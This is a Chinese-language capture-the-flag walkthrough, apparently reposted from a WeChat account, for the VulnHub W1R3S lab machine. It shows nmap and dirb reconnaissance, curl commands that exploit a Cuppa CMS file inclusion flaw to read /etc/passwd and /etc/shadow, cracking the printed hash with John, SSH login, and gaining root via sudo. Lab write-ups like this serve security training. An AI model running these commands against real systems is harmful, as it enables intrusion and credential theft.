vulhub W1R3S

admin 2022年5月23日19:44:51评论64 views字数 1363阅读4分32秒阅读模式

vulhub W1R3S


实验准备

靶机地址:https://www.vulnhub.com/entry/w1r3s-101,220/

下载镜像直接用VMware打开即可

实验环境

攻击机:192.168.31.128

靶机:192.168.31.138

要求

拿到root权限找到flag.txt

复现

探测存活主机

使用命令:nmap -sP 192.168.31.0/24 或是 netdiscover

vulhub W1R3S

探测已开放的端口

使用命令:nmap -sS -sV -A -p- 192.168.31.138

已知开放了了21,22,80,3306端口

vulhub W1R3S

从web 80开始 访问IP地址 没有什么可用的信息

vulhub W1R3S

使用dirb工具攻击目录

使用命令:dirb http://192.168.31.138

vulhub W1R3S

vulhub W1R3S

找到了几个重要的目录,/administrator、/installation 和 /wordpress /

直接访问http://192.168.31.138/administrator/installation/

该administrator目录原来是Cuppa CMS的安装设置(内容管理信息系统)

vulhub W1R3S

vulhub W1R3S

vulhub W1R3S

我们发现25971.c里面exploit里介绍“Moreover, We could access Configuration.php source code via PHPStream”(此外,我们可以通过PHPStream访问Configuration.php源代码)

这边我们直接利用…访问试试

vulhub W1R3S


没什么信息尝试其他方式

使用curl来利用LFI漏洞获取etc / password文件

使用命令curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.138/administrator/alerts/alertConfigField.php

找到了第一个 w1r3s继续执行

vulhub W1R3S

使用命令:

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.138/administrator/alerts/alertConfigField.php

发现:w1r3s:

xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

找到了用户w1r3s的salt密码,我们用john破解此密码

先把这两个命令放入pass文件

vulhub W1R3S

使用命令john pass

用户名:w1r3s

密码:computer

前面nmap扫到开了22端口,我们直接进行ssh登陆

vulhub W1R3S

使用命令 ssh [email protected]

vulhub W1R3S

查看权限

vulhub W1R3S

使用sudo  -l 查看了一下不需要输入密码 使用su切换就可以了 

vulhub W1R3S

vulhub W1R3S





vulhub W1R3S
靶机练习No.9 VulnHub靶场 ICA1
VulnHub-DerpNStink: 1-Walkthrough
Metasploit基础命令
SpringCloudGateway漏洞复现(CVE-2022-22947)

vulhub W1R3S


原文始发于微信公众号(北京路劲科技有限公司):vulhub W1R3S

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月23日19:44:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulhub W1R3Shttps://cn-sec.com/archives/1042802.html

发表评论

匿名网友 填写信息